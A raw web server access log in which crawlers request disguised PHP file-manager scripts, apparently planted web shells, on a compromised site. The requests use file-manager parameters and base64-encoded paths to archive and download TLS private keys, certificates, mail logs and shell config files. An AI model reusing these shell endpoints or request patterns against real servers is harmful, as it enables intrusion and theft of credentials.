74.7.227.14 - - [24/Dec/2025:07:11:03 -0600] "GET /resources/views/admin/bin.php HTTP/1.1" 200 662900 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:08 -0600] "GET /includes/libraries/vendor/356534.php HTTP/1.1" 200 56273 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
142.44.228.165 - - [24/Dec/2025:07:11:09 -0600] "GET /wp-comment.php?fm=true&edit=css.tar&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 2266520 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
74.7.227.14 - - [24/Dec/2025:07:11:09 -0600] "GET /resources/views/admin/wp-cron4640.php HTTP/1.1" 200 662956 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
15.235.96.130 - - [24/Dec/2025:07:11:14 -0600] "GET /wp-comment.php?fm=true&edit=components.tar.gz&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 18961 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
51.222.168.121 - - [24/Dec/2025:07:11:19 -0600] "GET /wp-comment.php?fm=true&edit=components.tar&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 1106364 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
51.222.168.94 - - [24/Dec/2025:07:11:24 -0600] "GET /wp-comment.php?fm=true&edit=certs.zip&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 18945 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
40.77.167.63 - - [24/Dec/2025:07:11:26 -0600] "GET /visitor/DetailView.aspx?NewsId=110264 HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
54.39.203.225 - - [24/Dec/2025:07:11:28 -0600] "GET /wp-comment.php?fm=true&edit=certs.tar.gz&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 18951 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
74.7.227.14 - - [24/Dec/2025:07:11:13 -0600] "GET /resources/views/layouts/wp-cron7573.php HTTP/1.1" 200 576442 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
142.44.225.218 - - [24/Dec/2025:07:11:33 -0600] "GET /wp-comment.php?fm=true&edit=certs.tar&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 29697 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.39.6.47 - - [24/Dec/2025:07:11:39 -0600] "GET /wp-comment.php?fm=true&edit=caches.zip&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 18947 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
74.7.227.14 - - [24/Dec/2025:07:11:30 -0600] "GET /vendor/laravel/framework/src/global.php?gzfile=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2FkbWluL3dwLWNyb240NjQwLnBocA== HTTP/1.1" 200 590292 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:39 -0600] "GET /vendor/laravel/framework/src/global.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2FkbWluL3dwLWNyb240NjQwLnBocA== HTTP/1.1" 200 94991 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:40 -0600] "GET /vendor/laravel/framework/src/global.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2FkbWluLzExODgwMS5waHAudGFy HTTP/1.1" 200 96768 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:41 -0600] "GET /vendor/laravel/framework/src/global.php?gzfile=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2FkbWluL2Jpbi5waHA= HTTP/1.1" 200 14566 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:41 -0600] "GET /vendor/laravel/framework/src/global.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2FkbWluLzIzMjM4NC5waHAudGFy HTTP/1.1" 200 96768 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:42 -0600] "GET /wp-content/uploads/2023/cache/353469.php?fm=true&path=/home/wsardargurjari/public_html/wp-content/uploads/2023/cache/&rights=dovecot.index.cache.tar HTTP/1.1" 200 18954 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:42 -0600] "GET /wp-content/uploads/2023/cache/353469.php?gzfile=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvd3AtY29udGVudC91cGxvYWRzLzIwMjMvY2FjaGUvd3AtbWFpbDU3MTMucGhw HTTP/1.1" 200 14566 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:43 -0600] "GET /wp-content/uploads/2023/cache/353469.php?fm=true&path=/home/wsardargurjari/public_html/wp-content/uploads/2023/cache/&rename=10.html.html.tar.gz HTTP/1.1" 200 18930 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:43 -0600] "GET /includes/libraries/vendor/356534.php?fm=true&path=/home/wsardargurjari/public_html/includes/libraries/vendor/&rights=wp-json8723.php.php.tar.gz HTTP/1.1" 200 18948 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
51.161.65.26 - - [24/Dec/2025:07:11:44 -0600] "GET /wp-comment.php?fm=true&edit=cache.tar.gz&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 18951 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
74.7.227.14 - - [24/Dec/2025:07:11:44 -0600] "GET /resources/views/admin/wp-cron4640.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=config.tar.gz HTTP/1.1" 200 18899 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:44 -0600] "GET /resources/views/admin/wp-cron4640.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=plugins.tar HTTP/1.1" 200 18895 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:45 -0600] "GET /resources/views/admin/wp-cron4640.php?edit=usage.png.tar&fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/ HTTP/1.1" 200 19025 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:45 -0600] "GET /resources/views/admin/wp-cron4640.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=vendor.tar.gz HTTP/1.1" 200 18915 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:46 -0600] "GET /resources/views/admin/wp-cron4640.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=analytics.tar HTTP/1.1" 200 18915 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:46 -0600] "GET /resources/views/admin/wp-cron4640.php?edit=laravel.tar&fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/ HTTP/1.1" 200 19024 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:47 -0600] "GET /resources/views/layouts/wp-cron7573.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rights=wp-content6872.php.tar HTTP/1.1" 200 18939 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:47 -0600] "GET /resources/views/layouts/wp-cron7573.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=.bashrc.bashrc.tar.gz HTTP/1.1" 200 18921 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:48 -0600] "GET /resources/views/layouts/wp-cron7573.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=jupiter_en_.cache.tar HTTP/1.1" 200 18921 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
167.114.139.233 - - [24/Dec/2025:07:11:48 -0600] "GET /wp-comment.php?fm=true&edit=cache.tar&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 18948 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
74.7.227.14 - - [24/Dec/2025:07:11:48 -0600] "GET /resources/views/layouts/wp-cron7573.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=cp-welcome-panel_dismissed.tar HTTP/1.1" 200 18939 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:49 -0600] "GET /resources/views/layouts/wp-cron7573.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/layouts/&rename=webalizer.current.current.tar.gz HTTP/1.1" 200 18943 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:50 -0600] "GET /resources/views/layouts/wp-cron7573.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2xheW91dHMvNDc4MTY0LnBocC50YXI= HTTP/1.1" 200 96768 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:50 -0600] "GET /resources/views/layouts/wp-cron7573.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2xheW91dHMvLkRyYWZ0cy50YXIuZ3o= HTTP/1.1" 200 200 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:51 -0600] "GET /resources/views/admin/wp-cron4640.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=inc.tar HTTP/1.1" 200 18903 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:51 -0600] "GET /resources/views/admin/wp-cron4640.php?edit=wp-admin1994.php.php.tar.gz&fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/ HTTP/1.1" 200 19053 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:52 -0600] "GET /resources/views/admin/wp-cron4640.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2FkbWluL21haWxib3hfZm9ybWF0LmNwYW5lbC5jcGFuZWwudGFyLmd6 HTTP/1.1" 200 129 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:52 -0600] "GET /resources/views/admin/wp-cron4640.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=.Trash.tar HTTP/1.1" 200 18893 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
54.39.203.52 - - [24/Dec/2025:07:11:52 -0600] "GET /wp-comment.php?fm=true&edit=awstats.tar.gz&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 18955 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
74.7.227.14 - - [24/Dec/2025:07:11:53 -0600] "GET /resources/views/admin/bin.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=478164.php.php.tar.gz HTTP/1.1" 200 18923 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:53 -0600] "GET /resources/views/admin/bin.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=989790.php.php.tar.gz HTTP/1.1" 200 18923 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:54 -0600] "GET /resources/views/admin/wp-cron4640.php?edit=dir.png.tar&fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/ HTTP/1.1" 200 19021 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:54 -0600] "GET /resources/views/admin/wp-cron4640.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=wp-json8723.php.tar HTTP/1.1" 200 18927 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:55 -0600] "GET /wp-content/uploads/2023/cache/353469.php?fm=true&path=/home/wsardargurjari/public_html/wp-content/uploads/2023/cache/&rename=usage_202512.html.html.tar.gz HTTP/1.1" 200 18950 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:55 -0600] "GET /resources/views/admin/bin.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=wp-json1198.php.php.tar.gz HTTP/1.1" 200 18917 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:56 -0600] "GET /resources/views/admin/bin.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=src.tar HTTP/1.1" 200 18879 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:56 -0600] "GET /resources/views/admin/wp-cron4640.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=sardargurjari_com_c6ac9_d7a65_1759509533_c58b24e648ab82168422d76177175cd5.crt.tar HTTP/1.1" 200 19035 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:57 -0600] "GET /resources/views/admin/wp-cron4640.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rename=119806.php.tar HTTP/1.1" 200 18901 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
148.113.128.243 - - [24/Dec/2025:07:11:57 -0600] "GET /wp-comment.php?fm=true&edit=awstats.tar&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 3450548 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
74.7.227.14 - - [24/Dec/2025:07:11:57 -0600] "GET /resources/views/admin/bin.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2FkbWluL21haWwudGFyLmd6 HTTP/1.1" 200 9849846 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:59 -0600] "GET /wp-content/uploads/2023/cache/353469.php?edit=wp-settings5625.php.php.tar.gz&fm=true&path=/home/wsardargurjari/public_html/wp-content/uploads/2023/cache/ HTTP/1.1" 200 19073 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:11:59 -0600] "GET /resources/views/admin/bin.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2FkbWluLy5zcGFtYXNzYXNzaW5lbmFibGUuc3BhbWFzc2Fzc2luZW5hYmxlLnRhci5neg== HTTP/1.1" 200 113 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:12:00 -0600] "GET /resources/views/admin/bin.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2FkbWluL3NlcnZlcnMuY2F0YWxvZ3VlLmxzdC5jYXRhbG9ndWUubHN0LnRhci5neg== HTTP/1.1" 200 148 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:12:00 -0600] "GET /resources/views/admin/bin.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2FkbWluL2I2ZTI2XzAyOWMzXzc4ZWIzNTkyYmJiYWRkMzUyM2UyZmIwZTgzMWQ1MzZkLmtleS5rZXkudGFyLmd6 HTTP/1.1" 200 1435 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:12:01 -0600] "GET /resources/views/admin/bin.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2FkbWluL2I2ZTI2XzAyOWMzXzc4ZWIzNTkyYmJiYWRkMzUyM2UyZmIwZTgzMWQ1MzZkLmtleS50YXI= HTTP/1.1" 200 3584 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
142.44.228.5 - - [24/Dec/2025:07:12:01 -0600] "GET /wp-comment.php?fm=true&edit=app.tar.gz&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 18947 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
148.113.128.93 - - [24/Dec/2025:07:12:05 -0600] "GET /wp-comment.php?fm=true&edit=app.tar&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 18944 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.39.203.27 - - [24/Dec/2025:07:12:09 -0600] "GET /wp-comment.php?fm=true&edit=analog.zip&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 14566 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
51.161.37.105 - - [24/Dec/2025:07:12:14 -0600] "GET /wp-comment.php?fm=true&edit=analog.tar.gz&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 18953 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
74.7.227.14 - - [24/Dec/2025:07:12:01 -0600] "GET /resources/views/layouts/wp-cron7573.php?gzfile=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2xheW91dHMvd3AtY3Jvbjc1NzMucGhw HTTP/1.1" 200 579357 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:12:16 -0600] "GET /resources/views/admin/bin.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2FkbWluL2NlZTgyXzEwM2NiX2IzNDkwYjNlMjU1Y2Y5ZTYyNGUxOWIwZTc3ZWU3ZDczLmtleS5rZXkudGFyLmd6 HTTP/1.1" 200 1428 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:12:17 -0600] "GET /resources/views/admin/bin.php?fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/&rights=usage_202507.html.tar HTTP/1.1" 200 18923 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:12:17 -0600] "GET /resources/views/admin/wp-cron4640.php?edit=awstats.tar&fm=true&path=/home/wsardargurjari/public_html/resources/views/admin/ HTTP/1.1" 200 3450620 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:12:18 -0600] "GET /resources/views/admin/bin.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2FkbWluL2RvdmVjb3QubWFpbGJveC5sb2cubWFpbGJveC5sb2cudGFyLmd6 HTTP/1.1" 200 147 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:12:18 -0600] "GET /resources/views/admin/bin.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2FkbWluL2RvdmVjb3QubGlzdC5pbmRleC5sb2cubGlzdC5pbmRleC5sb2cudGFyLmd6 HTTP/1.1" 200 883 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:12:19 -0600] "GET /resources/views/admin/bin.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2FkbWluL3NhcmRhcmd1cmphcmkuY29tLXNzbF9sb2cudGFy HTTP/1.1" 200 17240064 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:12:20 -0600] "GET /resources/views/admin/bin.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2FkbWluL2RvdmVjb3QuaW5kZXguY2FjaGUuaW5kZXguY2FjaGUudGFyLmd6 HTTP/1.1" 200 5215 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.54 - - [24/Dec/2025:07:12:20 -0600] "GET /wp-content/uploads/2023/cache/wp-config7291.php?edit=.spam.tar&fm=true&path=/home/wsardargurjari/public_html/wp-content/uploads/2023/cache/ HTTP/1.1" 200 19046 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:12:21 -0600] "GET /resources/views/admin/bin.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2FkbWluL2RvdmVjb3QtdWlkdmFsaWRpdHkuNjg2Y2RhZjEuNjg2Y2RhZjEudGFyLmd6 HTTP/1.1" 200 126 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:12:21 -0600] "GET /resources/views/admin/bin.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2FkbWluL3NhcmRhcmd1cmphcmlfY29tX2I2ZTI2XzAyOWMzXzE3ODMyNzI4MDZfMGQ4NjE5ZWYxZTFhOTE0YmJmYTRhMjU3MTE3OWFjYzAuY3J0LnRhcg== HTTP/1.1" 200 3072 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:12:22 -0600] "GET /resources/views/admin/bin.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2FkbWluL3NlcnZlcnMubm9taW5hdGlvbi5sc3Qubm9taW5hdGlvbi5sc3QudGFyLmd6 HTTP/1.1" 200 152 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:12:22 -0600] "GET /resources/views/admin/bin.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2FkbWluL3NlcnZlcnMuZGlzY292ZXJ5LmxzdC5kaXNjb3ZlcnkubHN0LnRhci5neg== HTTP/1.1" 200 147 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:12:23 -0600] "GET /resources/views/admin/bin.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2FkbWluL19vcHRfY3BhbmVsX2VhLXBocDczX3Jvb3RfdXNyX2Jpbl9waHBfLW5fLXYudGFy HTTP/1.1" 200 2048 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.14 - - [24/Dec/2025:07:12:23 -0600] "GET /resources/views/admin/bin.php?download=L2hvbWUvd3NhcmRhcmd1cmphcmkvcHVibGljX2h0bWwvcmVzb3VyY2VzL3ZpZXdzL2FkbWluL2RvdmVjb3QtdWlkdmFsaWRpdHkuNjg2Y2RhZjEudGFy HTTP/1.1" 200 1536 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
148.113.130.211 - - [24/Dec/2025:07:12:23 -0600] "GET /wp-comment.php?fm=true&edit=analog.tar&path=/home/wsardargurjari/public_html/ HTTP/1.1" 200 14566 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
